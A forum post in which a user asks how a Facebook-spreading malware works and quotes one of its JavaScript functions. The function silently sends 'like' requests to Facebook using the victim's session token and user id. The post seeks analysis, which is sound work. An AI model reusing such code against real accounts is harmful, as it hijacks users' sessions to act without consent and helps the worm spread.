Hi all,
I'm trying to understand how this malware works. I know that the malware spread by posting fake video posts on the user's wall and sends chat messages to the user's friends containing link to the fake video posts. I'm curious about one of the functions within the malware's script that utilizing facebook like (see below). Anyone can explains a bit what it does? Does the malware "like" the post that it just created on the user's wall or it "like" all the posts it ever created?
I attached here also a "follow-tcp-flow" wireshark dump of the malware communication to its servers.
Thanks!
-lz
--------------excerpt--------------------------------
. function like(id) {
var xmlhttpa = new XMLHttpRequest();
xmlhttpa.onreadystatechange = function () {
if (xmlhttpa.readyState == 4) {}
};
var params = "like_action=true";
params += "&ft_ent_identifier=" + id;
params += "&source=0&client_id=1355581664855%3A2475647505&ft[tn]=%3E%3D&ft[type]=20&nctr[_mod]=pagelet_timeline_recent";
params += "&fan_origin=page_timeline";
params += "&__user=" + uid();
params += "&__req=1e";
params += "&__dyn=7n8amgAMCBClUlgDxqigHzy5xNei9w";
params += "&__a=1";
params += "&fb_dtsg=" + dtsg();
params += "&phstamp=165816689711057878203";
xmlhttpa.open("POST", "/ajax/ufi/like.php", true);
xmlhttpa.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttpa.send(params);
}
